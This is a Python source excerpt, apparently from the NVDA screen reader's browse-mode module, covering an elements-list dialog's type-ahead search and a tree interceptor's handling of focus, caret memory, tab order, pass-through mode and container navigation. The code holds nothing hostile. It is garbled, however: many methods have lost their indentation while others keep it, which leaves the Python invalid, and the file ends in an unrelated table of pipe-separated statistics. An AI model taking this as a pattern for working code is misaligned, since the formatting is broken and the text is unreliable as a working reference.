def onTreeChar(self, evt):
key = evt.KeyCode
if key == wx.WXK_RETURN:
# The enter key should be propagated to the dialog and thus activate the default button,
# but this is broken (wx ticket #3725).
# Therefore, we must catch the enter key here.
# Activate the current default button.
evt = wx.CommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_ANY)
button = self.FindWindowById(self.AffirmativeId)
if button.Enabled:
button.ProcessEvent(evt)
else:
wx.Bell()
elif key == wx.WXK_F2:
item=self.tree.GetSelection()
if item:
selectedItemType=self.tree.GetItemData(item).item
self.tree.EditLabel(item)
evt.Skip()
elif key >= wx.WXK_START or key == wx.WXK_BACK:
# Non-printable character.
self._searchText = ""
evt.Skip()
else:
# Search the list.
# We have to implement this ourselves, as tree views don't accept space as a search character.
char = chr(evt.UnicodeKey).lower()
# IF the same character is typed twice, do the same search.
if self._searchText != char:
self._searchText += char
if self._searchCallLater:
self._searchCallLater.Restart()
else:
self._searchCallLater = wx.CallLater(1000, self._clearSearchText)
self.search(self._searchText)
def onTreeLabelEditBegin(self,evt):
item=self.tree.GetSelection()
selectedItemType = self.tree.GetItemData(item).item
if not selectedItemType.isRenameAllowed:
evt.Veto()
def onTreeLabelEditEnd(self,evt):
selectedItemNewName=evt.GetLabel()
item=self.tree.GetSelection()
selectedItemType = self.tree.GetItemData(item).item
selectedItemType.rename(selectedItemNewName)
	def _clearSearchText(self):
		# Timer callback (see onTreeChar) that resets the incremental search buffer.
		self._searchText = ""
	def search(self, searchText):
		"""Select the first reachable tree item whose label starts with searchText,
		searching forward from the current selection and wrapping to the top.
		Beeps if nothing matches.
		"""
		item = self.tree.GetSelection()
		if not item:
			# No items.
			return
		# First try searching from the current item.
		# Failing that, search from the first item.
		items = itertools.chain(self._iterReachableTreeItemsFromItem(item), self._iterReachableTreeItemsFromItem(self.tree.GetFirstChild(self.treeRoot)[0]))
		if len(searchText) == 1:
			# If only a single character has been entered, skip (search after) the current item.
			next(items)
		for item in items:
			if self.tree.GetItemText(item).lower().startswith(searchText):
				self.tree.SelectItem(item)
				return
		# Not found.
		wx.Bell()
def _iterReachableTreeItemsFromItem(self, item):
while item:
yield item
childItem = self.tree.GetFirstChild(item)[0]
if childItem and self.tree.IsExpanded(item):
# Has children and is reachable, so recurse.
for childItem in self._iterReachableTreeItemsFromItem(childItem):
yield childItem
item = self.tree.GetNextSibling(item)
def onFilterEditTextChange(self, evt):
self.filter(self.filterEdit.GetValue())
evt.Skip()
	def onAction(self, activate):
		"""Close the dialog and act on the selected element.
		@param activate: C{True} to activate the element, C{False} to move the cursor to it.
		"""
		# Capture the previous focus before closing, for the double-announce check below.
		prevFocus = gui.mainFrame.prevFocus
		self.Close()
		# Save off the last selected element type on to the class so its used in initialization next time.
		self.__class__.lastSelectedElementType=self.lastSelectedElementType
		item = self.tree.GetSelection()
		item = self.tree.GetItemData(item).item
		if activate:
			item.activate()
		else:
			def move():
				speech.cancelSpeech()
				# Avoid double announce if item.obj is about to gain focus.
				if not (
					self.document.passThrough
					and getattr(item, "obj", False)
					and item.obj != prevFocus
					and controlTypes.State.FOCUSABLE in item.obj.states
				):
					# #8831: Report before moving because moving might change the focus, which
					# might mutate the document, potentially invalidating info if it is
					# offset-based.
					item.report()
				item.moveTo()
			# We must use core.callLater rather than wx.CallLater to ensure that the callback runs within NVDA's core pump.
			# If it didn't, and it directly or indirectly called wx.Yield, it could start executing NVDA's core pump from within the yield, causing recursion.
			core.callLater(100, move)
class BrowseModeDocumentTextInfo(textInfos.TextInfo):

	def _get_focusableNVDAObjectAtStart(self):
		"""Return the NVDAObject of the nearest focusable node at or above the start of this range,
		falling back to the document's root NVDAObject when none is found.
		"""
		item = next(self.obj._iterNodesByType("focusable", "up", self), None)
		# Fall back to the root both when iteration is exhausted and when a falsy item is yielded.
		return item.obj if item else self.obj.rootNVDAObject
class BrowseModeDocumentTreeInterceptor(documentBase.DocumentWithTableNavigation,cursorManager.CursorManager,BrowseModeTreeInterceptor,treeInterceptorHandler.DocumentTreeInterceptor):
programmaticScrollMayFireEvent = False
	def __init__(self,obj):
		super(BrowseModeDocumentTreeInterceptor,self).__init__(obj)
		self._lastProgrammaticScrollTime = None
		# Snapshot the documentConstantIdentifier property onto the instance;
		# presumably so it stays available after the underlying document dies -- TODO confirm.
		self.documentConstantIdentifier = self.documentConstantIdentifier
		self._lastFocusObj = None
		self._objPendingFocusBeforeActivate = None
		self._hadFirstGainFocus = False
		self._enteringFromOutside = True
		# We need to cache this because it will be unavailable once the document dies.
		if not hasattr(self.rootNVDAObject.appModule, "_browseModeRememberedCaretPositions"):
			self.rootNVDAObject.appModule._browseModeRememberedCaretPositions = {}
		self._lastCaretPosition = None
		#: True if the last caret move was due to a focus change.
		self._lastCaretMoveWasFocus = False
	def terminate(self):
		"""Persist the last caret position (keyed by documentConstantIdentifier)
		so it can be restored the next time this document loads.
		"""
		if self.shouldRememberCaretPositionAcrossLoads and self._lastCaretPosition:
			try:
				self.rootNVDAObject.appModule._browseModeRememberedCaretPositions[self.documentConstantIdentifier] = self._lastCaretPosition
			except AttributeError:
				# The app module died.
				pass
def _get_currentNVDAObject(self):
return self.makeTextInfo(textInfos.POSITION_CARET).NVDAObjectAtStart
	def event_treeInterceptor_gainFocus(self):
		"""Handle this tree interceptor gaining focus.
		On the very first gain focus, replays the missed focus event, optionally restores
		the caret position and may start say-all; afterwards it reports the document and
		current selection as appropriate for the current pass-through state.
		"""
		doSayAll=False
		hadFirstGainFocus=self._hadFirstGainFocus
		if not hadFirstGainFocus:
			# This treeInterceptor is gaining focus for the first time.
			# Fake a focus event on the focus object, as the treeInterceptor may have missed the actual focus event.
			focus = api.getFocusObject()
			self.event_gainFocus(focus, lambda: focus.event_gainFocus())
			if not self.passThrough:
				# We only set the caret position if in browse mode.
				# If in focus mode, the document must have forced the focus somewhere,
				# so we don't want to override it.
				initialPos = self._getInitialCaretPos()
				if initialPos:
					self.selection = self.makeTextInfo(initialPos)
				reportPassThrough(self)
				doSayAll=config.conf['virtualBuffers']['autoSayAllOnPageLoad']
			self._hadFirstGainFocus = True
		if not self.passThrough:
			if doSayAll:
				speech.speakObjectProperties(self.rootNVDAObject, name=True, states=True, reason=OutputReason.FOCUS)
				sayAll.SayAllHandler.readText(sayAll.CURSOR.CARET)
			else:
				# Speak it like we would speak focus on any other document object.
				# This includes when entering the treeInterceptor for the first time:
				if not hadFirstGainFocus:
					speech.speakObject(self.rootNVDAObject, reason=OutputReason.FOCUS)
				else:
					# And when coming in from an outside object
					# #4069 But not when coming up from a non-rendered descendant.
					ancestors=api.getFocusAncestors()
					fdl=api.getFocusDifferenceLevel()
					try:
						tl=ancestors.index(self.rootNVDAObject)
					except ValueError:
						tl=len(ancestors)
					if fdl<=tl:
						speech.speakObject(self.rootNVDAObject, reason=OutputReason.FOCUS)
				info = self.selection
				if not info.isCollapsed:
					speech.speakPreselectedText(info.text)
				else:
					info.expand(textInfos.UNIT_LINE)
					speech.speakTextInfo(info, reason=OutputReason.CARET, unit=textInfos.UNIT_LINE)
		reportPassThrough(self)
		braille.handler.handleGainFocus(self)
def event_caret(self, obj, nextHandler):
if self.passThrough:
nextHandler()
	def _activateLongDesc(self,controlField):
		"""
		Activates (presents) the long description for a particular field (usually a graphic).
		Subclasses must override this; the base implementation is abstract.
		@param controlField: the field whose long description should be activated. This field is guaranteed to have states containing HASLONGDESC state.
		@type controlField: dict
		@raise NotImplementedError: always, in this base implementation.
		"""
		raise NotImplementedError
def _activatePosition(self, obj=None, info=None):
if info:
obj=info.NVDAObjectAtStart
if not obj:
return
super(BrowseModeDocumentTreeInterceptor,self)._activatePosition(obj=obj)
	def _set_selection(self, info, reason=OutputReason.CARET):
		"""Set the selection, remember the caret position for terminate(),
		scroll the new position into view, and update focus/pass-through state.
		@param info: the new selection.
		@param reason: the output reason that caused this selection change.
		"""
		super(BrowseModeDocumentTreeInterceptor, self)._set_selection(info)
		if isScriptWaiting() or not info.isCollapsed:
			return
		# Save the last caret position for use in terminate().
		# This must be done here because the buffer might be cleared just before terminate() is called,
		# causing the last caret position to be lost.
		caret = info.copy()
		caret.collapse()
		self._lastCaretPosition = caret.bookmark
		review.handleCaretMove(caret)
		if reason == OutputReason.FOCUS:
			self._lastCaretMoveWasFocus = True
			focusObj = api.getFocusObject()
			if focusObj==self.rootNVDAObject:
				return
		else:
			self._lastCaretMoveWasFocus = False
			focusObj=info.focusableNVDAObjectAtStart
			obj=info.NVDAObjectAtStart
			if not obj:
				log.debugWarning("Invalid NVDAObjectAtStart")
				return
			if obj==self.rootNVDAObject:
				return
			obj.scrollIntoView()
			if self.programmaticScrollMayFireEvent:
				# Record when we scrolled, so _handleScrollTo can ignore the resulting event.
				self._lastProgrammaticScrollTime = time.time()
		if focusObj:
			self.passThrough = self.shouldPassThrough(focusObj, reason=reason)
			if (
				not eventHandler.isPendingEvents("gainFocus")
				and focusObj != self.rootNVDAObject
				and focusObj != api.getFocusObject()
				and self._shouldSetFocusToObj(focusObj)
			):
				followBrowseModeFocus = config.conf["virtualBuffers"]["autoFocusFocusableElements"]
				if followBrowseModeFocus or self.passThrough:
					focusObj.setFocus()
			# Queue the reporting of pass through mode so that it will be spoken after the actual content.
			queueHandler.queueFunction(queueHandler.eventQueue, reportPassThrough, self)
def _shouldSetFocusToObj(self, obj):
"""Determine whether an object should receive focus.
Subclasses may extend or override this method.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
"""
return obj.role not in self.APPLICATION_ROLES and obj.isFocusable and obj.role!=controlTypes.Role.EMBEDDEDOBJECT
	def script_activateLongDesc(self,gesture):
		# Find the innermost control field at the caret that has a long description and activate it.
		info=self.makeTextInfo(textInfos.POSITION_CARET)
		info.expand("character")
		# reversed() so the innermost (most recently started) control field is checked first.
		for field in reversed(info.getTextWithFields()):
			if isinstance(field,textInfos.FieldCommand) and field.command=="controlStart":
				states=field.field.get('states')
				if states and controlTypes.State.HASLONGDESC in states:
					self._activateLongDesc(field.field)
					break
		else:
			# for/else: no field with a long description was found.
			# Translators: the message presented when the activateLongDescription script cannot locate a long description to activate.
			ui.message(_("No long description"))
	# Translators: the description for the activateLongDescription script on browseMode documents.
	script_activateLongDesc.__doc__=_("Shows the long description at this position if one is found.")
	def event_caretMovementFailed(self, obj, nextHandler, gesture=None):
		"""When the caret can't move further inside a focused control while in pass-through mode,
		move the virtual caret to the matching edge of the control field and requeue the script,
		allowing auto pass-through on caret move to take effect.
		"""
		if not self.passThrough or not gesture or not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"]:
			return nextHandler()
		if gesture.mainKeyName in ("home", "end"):
			# Home, end, control+home and control+end should not disable pass through.
			return nextHandler()
		script = self.getScript(gesture)
		if not script:
			return nextHandler()
		# We've hit the edge of the focused control.
		# Therefore, move the virtual caret to the same edge of the field.
		info = self.makeTextInfo(textInfos.POSITION_CARET)
		info.expand(textInfos.UNIT_CONTROLFIELD)
		if gesture.mainKeyName in ("leftArrow", "upArrow", "pageUp"):
			info.collapse()
		else:
			info.collapse(end=True)
			info.move(textInfos.UNIT_CHARACTER, -1)
		info.updateCaret()
		scriptHandler.queueScript(script, gesture)
	currentExpandedControl=None #: an NVDAObject representing the control that has just been expanded with the collapseOrExpandControl script.
	def script_collapseOrExpandControl(self, gesture):
		# Pass the gesture on to the control and switch pass-through mode based on the
		# control's collapsed/expanded state before the gesture was sent.
		if not config.conf["virtualBuffers"]["autoFocusFocusableElements"]:
			self._focusLastFocusableObject()
		oldFocus = api.getFocusObject()
		oldFocusStates = oldFocus.states
		gesture.send()
		if controlTypes.State.COLLAPSED in oldFocusStates:
			self.passThrough = True
			# When a control (such as a combo box) is expanded, we expect that its descendants will be classed as being outside the browseMode document.
			# We save off the expanded control so that the next focus event within the browseMode document can see if it is for the control,
			# and if so, it disables passthrough, as the control has obviously been collapsed again.
			self.currentExpandedControl=oldFocus
		elif not self.disableAutoPassThrough:
			self.passThrough = False
		reportPassThrough(self)
	def _tabOverride(self, direction):
		"""Override the tab order if the virtual caret is not within the currently focused node.
		This is done because many nodes are not focusable and it is thus possible for the virtual caret to be unsynchronised with the focus.
		In this case, we want tab/shift+tab to move to the next/previous focusable node relative to the virtual caret.
		If the virtual caret is within the focused node, the tab/shift+tab key should be passed through to allow normal tab order navigation.
		Note that this method does not pass the key through itself if it is not overridden. This should be done by the calling script if C{False} is returned.
		@param direction: The direction in which to move.
		@type direction: str
		@return: C{True} if the tab order was overridden, C{False} if not.
		@rtype: bool
		"""
		if self._lastCaretMoveWasFocus:
			# #5227: If the caret was last moved due to a focus change, don't override tab.
			# This ensures that tabbing behaves as expected after tabbing hits an iframe document.
			return False
		focus = api.getFocusObject()
		try:
			focusInfo = self.makeTextInfo(focus)
		except:
			# The focus is not in this document, so normal tabbing applies.
			return False
		# We only want to override the tab order if the caret is not within the focused node.
		caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
		#Only check that the caret is within the focus for things that are not documents
		#As for documents we should always override
		if focus.role!=controlTypes.Role.DOCUMENT or controlTypes.State.EDITABLE in focus.states:
			# Expand to one character, as isOverlapping() doesn't yield the desired results with collapsed ranges.
			caretInfo.expand(textInfos.UNIT_CHARACTER)
			if focusInfo.isOverlapping(caretInfo):
				return False
		# If we reach here, we do want to override tab/shift+tab if possible.
		# Find the next/previous focusable node.
		try:
			item = next(self._iterNodesByType("focusable", direction, caretInfo))
		except StopIteration:
			return False
		obj=item.obj
		newInfo=item.textInfo
		if obj == api.getFocusObject():
			# This node is already focused, so we need to move to and speak this node here.
			newCaret = newInfo.copy()
			newCaret.collapse()
			self._set_selection(newCaret, reason=OutputReason.FOCUS)
			if self.passThrough:
				obj.event_gainFocus()
			else:
				speech.speakTextInfo(newInfo, reason=OutputReason.FOCUS)
		else:
			# This node doesn't have the focus, so just set focus to it. The gainFocus event will handle the rest.
			obj.setFocus()
		return True
def script_tab(self, gesture):
if not self._tabOverride("next"):
gesture.send()
def script_shiftTab(self, gesture):
if not self._tabOverride("previous"):
gesture.send()
	def event_focusEntered(self,obj,nextHandler):
		"""Record entry into the document; focusEntered events are deliberately dropped here
		(nextHandler is intentionally not called).
		"""
		if obj==self.rootNVDAObject:
			self._enteringFromOutside = True
		# Even if passThrough is enabled, we still completely drop focusEntered events here.
		# In order to get them back when passThrough is enabled, we replay them with the _replayFocusEnteredEvents method in event_gainFocus.
		# The reason for this is to ensure that focusEntered events are delayed until a focus event has had a chance to disable passthrough mode.
		# As in this case we would not want them.
def _shouldIgnoreFocus(self, obj):
"""Determines whether focus on a given object should be ignored.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if focus on L{obj} should be ignored, C{False} otherwise.
@rtype: bool
"""
return False
	def _postGainFocus(self, obj):
		"""Hook executed after a gainFocus within the browseMode document.
		This will not be executed if L{event_gainFocus} determined that it should abort and call nextHandler.
		The base implementation does nothing; subclasses may override.
		@param obj: The object that gained focus.
		@type obj: L{NVDAObjects.NVDAObject}
		"""
def _replayFocusEnteredEvents(self):
# We blocked the focusEntered events because we were in browse mode,
# but now that we've switched to focus mode, we need to fire them.
for parent in api.getFocusAncestors()[api.getFocusDifferenceLevel():]:
try:
parent.event_focusEntered()
except:
log.exception("Error executing focusEntered event: %s" % parent)
	def event_gainFocus(self, obj, nextHandler):
		"""Handle an object inside this browseMode document gaining focus.
		Decides whether to sync the virtual caret, toggle pass-through mode,
		speak the focused content and/or forward the event to nextHandler.
		"""
		enteringFromOutside=self._enteringFromOutside
		self._enteringFromOutside=False
		if not self.isReady:
			if self.passThrough:
				self._replayFocusEnteredEvents()
				nextHandler()
			return
		# If a control has been expanded by the collapseOrExpandControl script, and this focus event is for it,
		# disable passThrough and report the control, as the control has obviously been collapsed again.
		# Note that whether or not this focus event was for that control, the last expanded control is forgotten, so that only the next focus event for the browseMode document can handle the collapsed control.
		lastExpandedControl=self.currentExpandedControl
		self.currentExpandedControl=None
		if self.passThrough and obj==lastExpandedControl:
			self.passThrough=False
			reportPassThrough(self)
			nextHandler()
			return
		if enteringFromOutside and not self.passThrough and self._lastFocusObj==obj:
			# We're entering the document from outside (not returning from an inside object/application; #3145)
			# and this was the last non-root node with focus, so ignore this focus event.
			# Otherwise, if the user switches away and back to this document, the cursor will jump to this node.
			# This is not ideal if the user was positioned over a node which cannot receive focus.
			return
		if obj==self.rootNVDAObject:
			if self.passThrough:
				self._replayFocusEnteredEvents()
				return nextHandler()
			return
		if not self.passThrough and self._shouldIgnoreFocus(obj):
			return
		# If the previous focus object was removed, we might hit a false positive for overlap detection.
		# Track the previous focus target so that we can account for this scenario.
		previousFocusObjIsDefunct = False
		if self._lastFocusObj:
			try:
				states = self._lastFocusObj.states
				previousFocusObjIsDefunct = controlTypes.State.DEFUNCT in states
			except Exception:
				log.debugWarning(
					"Error fetching states when checking for defunct object. Treating object as defunct anyway.",
					exc_info=True
				)
				previousFocusObjIsDefunct = True
		self._lastFocusObj=obj
		try:
			focusInfo = self.makeTextInfo(obj)
		except:
			# This object is not in the treeInterceptor, even though it resides beneath the document.
			# Automatic pass through should be enabled in certain circumstances where this occurs.
			if not self.passThrough and self.shouldPassThrough(obj, reason=OutputReason.FOCUS):
				self.passThrough=True
				reportPassThrough(self)
				self._replayFocusEnteredEvents()
			return nextHandler()
		#We only want to update the caret and speak the field if we're not in the same one as before
		caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
		# Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping.
		caretInfo.expand(textInfos.UNIT_CHARACTER)
		isOverlapping = focusInfo.isOverlapping(caretInfo)
		if not self._hadFirstGainFocus or not isOverlapping or (isOverlapping and previousFocusObjIsDefunct):
			# The virtual caret is not within the focus node.
			oldPassThrough=self.passThrough
			passThrough = self.shouldPassThrough(obj, reason=OutputReason.FOCUS)
			if not oldPassThrough and (passThrough or sayAll.SayAllHandler.isRunning()):
				# If pass-through is disabled, cancel speech, as a focus change should cause page reading to stop.
				# This must be done before auto-pass-through occurs, as we want to stop page reading even if pass-through will be automatically enabled by this focus change.
				speech.cancelSpeech()
			self.passThrough=passThrough
			if not self.passThrough:
				# We read the info from the browseMode document instead of the control itself.
				speech.speakTextInfo(focusInfo, reason=OutputReason.FOCUS)
				# However, we still want to update the speech property cache so that property changes will be spoken properly.
				speech.speakObject(obj, controlTypes.OutputReason.ONLYCACHE)
				# As we do not call nextHandler which would trigger the vision framework to handle gain focus,
				# we need to call it manually here.
				vision.handler.handleGainFocus(obj)
			else:
				# Although we are going to speak the object rather than textInfo content, we still need to silently speak the textInfo content so that the textInfo speech cache is updated correctly.
				# Not doing this would cause later browseMode speaking to either not speak controlFields it had entered, or speak controlField exits after having already exited.
				# See #7435 for a discussion on this.
				speech.speakTextInfo(focusInfo, reason=OutputReason.ONLYCACHE)
				self._replayFocusEnteredEvents()
				nextHandler()
			focusInfo.collapse()
			self._set_selection(focusInfo, reason=OutputReason.FOCUS)
		else:
			# The virtual caret was already at the focused node.
			if not self.passThrough:
				# This focus change was caused by a virtual caret movement, so don't speak the focused node to avoid double speaking.
				# However, we still want to update the speech property cache so that property changes will be spoken properly.
				speech.speakObject(obj, OutputReason.ONLYCACHE)
				if config.conf["virtualBuffers"]["autoFocusFocusableElements"]:
					# As we do not call nextHandler which would trigger the vision framework to handle gain focus,
					# we need to call it manually here.
					# Note: this is usually called after the caret movement.
					vision.handler.handleGainFocus(obj)
				elif (
					self._objPendingFocusBeforeActivate
					and obj == self._objPendingFocusBeforeActivate
					and obj is not self._objPendingFocusBeforeActivate
				):
					# With auto focus focusable elements disabled, when the user activates
					# an element (e.g. by pressing enter) or presses a key which we pass
					# through (e.g. control+enter), we call _focusLastFocusableObject.
					# However, the activation/key press might cause a property change
					# before we get the focus event, so NVDA's normal reporting of
					# changes to the focus won't pick it up.
					# The speech property cache on _objPendingFocusBeforeActivate reflects
					# the properties before the activation/key, so use that to speak any
					# changes.
					speech.speakObject(
						self._objPendingFocusBeforeActivate,
						OutputReason.CHANGE
					)
					self._objPendingFocusBeforeActivate = None
			else:
				self._replayFocusEnteredEvents()
				return nextHandler()
		self._postGainFocus(obj)
	# Process this event even before the document is fully ready.
	event_gainFocus.ignoreIsReady=True
	def _handleScrollTo(
			self,
			obj: Union[NVDAObject, textInfos.TextInfo],
	) -> bool:
		"""Handle scrolling the browseMode document to a given object in response to an event.
		Subclasses should call this from an event which indicates that the document has scrolled.
		@postcondition: The virtual caret is moved to L{obj} and the buffer content for L{obj} is reported.
		@param obj: The object to which the document should scroll.
		@return: C{True} if the document was scrolled, C{False} if not.
		@note: If C{False} is returned, calling events should probably call their nextHandler.
		@raise ValueError: if obj is neither an NVDAObject nor a TextInfo.
		"""
		if self.programmaticScrollMayFireEvent and self._lastProgrammaticScrollTime and time.time() - self._lastProgrammaticScrollTime < 0.4:
			# This event was probably caused by this browseMode document's call to scrollIntoView().
			# Therefore, ignore it. Otherwise, the cursor may bounce back to the scroll point.
			# However, pretend we handled it, as we don't want it to be passed on to the object either.
			return True
		if isinstance(obj, NVDAObject):
			try:
				scrollInfo = self.makeTextInfo(obj)
			except (NotImplementedError, RuntimeError):
				return False
		elif isinstance(obj, textInfos.TextInfo):
			scrollInfo = obj.copy()
		else:
			raise ValueError(f"{obj} is not a supported type")
		#We only want to update the caret and speak the field if we're not in the same one as before
		caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
		# Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping.
		caretInfo.expand(textInfos.UNIT_CHARACTER)
		if not scrollInfo.isOverlapping(caretInfo):
			if scrollInfo.isCollapsed:
				scrollInfo.expand(textInfos.UNIT_LINE)
			speech.speakTextInfo(scrollInfo, reason=OutputReason.CARET)
			scrollInfo.collapse()
			self.selection = scrollInfo
			return True
		return False
def _isNVDAObjectInApplication_noWalk(self, obj):
"""Determine whether a given object is within an application without walking ancestors.
The base implementation simply checks whether the object has an application role.
Subclasses can override this if they can provide a definite answer without needing to walk.
For example, for virtual buffers, if the object is in the buffer,
it definitely isn't in an application.
L{_isNVDAObjectInApplication} calls this and walks to the next ancestor if C{None} is returned.
@return: C{True} if definitely in an application,
C{False} if definitely not in an application,
C{None} if this can't be determined without walking ancestors.
"""
if (
# roles such as application and dialog should be treated as being within a "application" and therefore outside of the browseMode document.
obj.role in self.APPLICATION_ROLES
# Anything other than an editable text box inside a combo box should be
# treated as being outside a browseMode document.
or (
obj.role != controlTypes.Role.EDITABLETEXT and obj.container
and obj.container.role == controlTypes.Role.COMBOBOX
)
):
return True
return None
	def _isNVDAObjectInApplication(self, obj):
		"""Determine whether a given object is within an application.
		The object is considered to be within an application if it or one of its ancestors has an application role.
		This should only be called on objects beneath the treeInterceptor's root NVDAObject.
		@param obj: The object in question.
		@type obj: L{NVDAObjects.NVDAObject}
		@return: C{True} if L{obj} is within an application, C{False} otherwise.
		@rtype: bool
		"""
		# We cache the result for each object we walk.
		# There can be browse mode documents within other documents and the result might be different between these,
		# so the cache must be maintained on the TreeInterceptor rather than the object itself.
		try:
			cache = self._isInAppCache
		except AttributeError:
			# Create this lazily, as this method isn't used by all browse mode implementations.
			cache = self._isInAppCache = weakref.WeakKeyDictionary()
		objs = []
		def doResult(result):
			# Cache this on descendants we've walked over.
			for obj in objs:
				cache[obj] = result
			return result
		while obj and obj != self.rootNVDAObject:
			inApp = cache.get(obj)
			if inApp is not None:
				# We found a cached result.
				return doResult(inApp)
			objs.append(obj)
			inApp = self._isNVDAObjectInApplication_noWalk(obj)
			if inApp is not None:
				return doResult(inApp)
			# We must walk ancestors.
			# Cache container.
			# NOTE(review): assigning the fetched container back onto the object presumably
			# memoises the property for later use -- confirm against NVDAObject semantics.
			container = obj.container
			obj.container = container
			obj = container
		return doResult(False)
def _get_documentConstantIdentifier(self):
"""Get the constant identifier for this document.
This identifier should uniquely identify all instances (not just one instance) of a document for at least the current session of the hosting application.
Generally, the document URL should be used.
@return: The constant identifier for this document, C{None} if there is none.
"""
return None
def _get_shouldRememberCaretPositionAcrossLoads(self):
"""Specifies whether the position of the caret should be remembered when this document is loaded again.
This is useful when the browser remembers the scroll position for the document,
but does not communicate this information via APIs.
The remembered caret position is associated with this document using L{documentConstantIdentifier}.
@return: C{True} if the caret position should be remembered, C{False} if not.
@rtype: bool
"""
docConstId = self.documentConstantIdentifier
# Return True if the URL indicates that this is probably a web browser document.
# We do this check because we don't want to remember caret positions for email messages, etc.
if isinstance(docConstId, str):
protocols=("http", "https", "ftp", "ftps", "file")
protocol=docConstId.split("://", 1)[0]
return protocol in protocols
return False
def _getInitialCaretPos(self):
"""Retrieve the initial position of the caret after the buffer has been loaded.
This position, if any, will be passed to L{makeTextInfo}.
Subclasses should extend this method.
@return: The initial position of the caret, C{None} if there isn't one.
@rtype: TextInfo position
"""
if self.shouldRememberCaretPositionAcrossLoads:
try:
return self.rootNVDAObject.appModule._browseModeRememberedCaretPositions[self.documentConstantIdentifier]
except KeyError:
pass
return None
def getEnclosingContainerRange(self, textRange):
textRange = textRange.copy()
textRange.collapse()
try:
item = next(self._iterNodesByType("container", "up", textRange))
except (NotImplementedError,StopIteration):
try:
item = next(self._iterNodesByType("landmark", "up", textRange))
except (NotImplementedError,StopIteration):
return
return item.textInfo
	def script_moveToStartOfContainer(self,gesture):
		# Move the virtual caret to the start of the enclosing container (list, table, etc.).
		info=self.makeTextInfo(textInfos.POSITION_CARET)
		info.expand(textInfos.UNIT_CHARACTER)
		container=self.getEnclosingContainerRange(info)
		if not container:
			# Translators: Reported when the user attempts to move to the start or end of a container
			# (list, table, etc.) but there is no container.
			ui.message(_("Not in a container"))
			return
		container.collapse()
		self._set_selection(container, reason=OutputReason.QUICKNAV)
		if not willSayAllResume(gesture):
			# Only speak the landing line when say-all is not about to resume.
			container.expand(textInfos.UNIT_LINE)
			speech.speakTextInfo(container, reason=OutputReason.FOCUS)
	script_moveToStartOfContainer.resumeSayAllMode = sayAll.CURSOR.CARET
	# Translators: Description for the Move to start of container command in browse mode.
	script_moveToStartOfContainer.__doc__=_("Moves to the start of the container element, such as a list or table")
	def script_movePastEndOfContainer(self,gesture):
		# Move the virtual caret just past the end of the enclosing container (list, table, etc.),
		# clamping to the end of the document.
		info=self.makeTextInfo(textInfos.POSITION_CARET)
		info.expand(textInfos.UNIT_CHARACTER)
		container=self.getEnclosingContainerRange(info)
		if not container:
			# Translators: Reported when the user attempts to move to the start or end of a container
			# (list, table, etc.) but there is no container.
			ui.message(_("Not in a container"))
			return
		container.collapse(end=True)
		docEnd=container.obj.makeTextInfo(textInfos.POSITION_LAST)
		if container.compareEndPoints(docEnd,"endToEnd")>=0:
			# The container ends at (or past) the document end; clamp and report it.
			container=docEnd
			# Translators: a message reported when:
			# Review cursor is at the bottom line of the current navigator object.
			# Landing at the end of a browse mode document when trying to jump to the end of the current container.
			ui.message(_("Bottom"))
		self._set_selection(container, reason=OutputReason.QUICKNAV)
		if not willSayAllResume(gesture):
			container.expand(textInfos.UNIT_LINE)
			speech.speakTextInfo(container, reason=OutputReason.FOCUS)
	script_movePastEndOfContainer.resumeSayAllMode = sayAll.CURSOR.CARET
	# Translators: Description for the Move past end of container command in browse mode.
	script_movePastEndOfContainer.__doc__=_("Moves past the end of the container element, such as a list or table")
NOT_LINK_BLOCK_MIN_LEN = 30
def _isSuitableNotLinkBlock(self, textRange):
return len(textRange.text) >= self.NOT_LINK_BLOCK_MIN_LEN
	def _iterNotLinkBlock(self, direction="next", pos=None):
		"""Yield quick-nav items for sufficiently long stretches of text between consecutive links
		(see L{_isSuitableNotLinkBlock}).
		@param direction: "next" or "previous".
		@param pos: the position from which to start iterating links.
		"""
		links = self._iterNodesByType("link", direction=direction, pos=pos)
		# We want to compare each link against the next link.
		item1 = next(links, None)
		if item1 is None:
			return
		for item2 in links:
			# If the distance between the links is small, this is probably just a piece of non-link text within a block of links; e.g. an inactive link of a nav bar.
			if direction=="previous":
				textRange=item1.textInfo.copy()
				textRange.collapse()
				textRange.setEndPoint(item2.textInfo,"startToEnd")
			else:
				textRange=item2.textInfo.copy()
				textRange.collapse()
				textRange.setEndPoint(item1.textInfo,"startToEnd")
			if self._isSuitableNotLinkBlock(textRange):
				yield TextInfoQuickNavItem("notLinkBlock", self, textRange)
			item1=item2
__gestures={
"kb:NVDA+d": "activateLongDesc",
"kb:alt+upArrow": "collapseOrExpandControl",
"kb:alt+downArrow": "collapseOrExpandControl",
"kb:tab": "tab",
"kb:shift+tab": "shiftTab",
"kb:shift+,": "moveToStartOfContainer",
"kb:,": "movePastEndOfContainer",
}
	@script(
		description=_(
			# Translators: the description for the toggleScreenLayout script.
			"Toggles on and off if the screen layout is preserved while rendering the document content"
		),
		gesture="kb:NVDA+v",
	)
	def script_toggleScreenLayout(self, gesture):
		# Base implementation: screen layout toggling is not supported here;
		# presumably overridden where an implementation supports it -- TODO confirm.
		# Translators: The message reported for not supported toggling of screen layout
		ui.message(_("Not supported in this document."))
| 44.265625
| 229
| 0.740899
| 10,985
| 84,990
| 5.67929
| 0.117979
| 0.025005
| 0.015837
| 0.019491
| 0.365092
| 0.303765
| 0.279145
| 0.263516
| 0.258243
| 0.249427
| 0
| 0.002256
| 0.181245
| 84,990
| 1,919
| 230
| 44.288692
| 0.894289
| 0.426191
| 0
| 0.297735
| 0
| 0.000809
| 0.134236
| 0.011349
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072816
| false
| 0.072006
| 0.032362
| 0.008091
| 0.193366
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
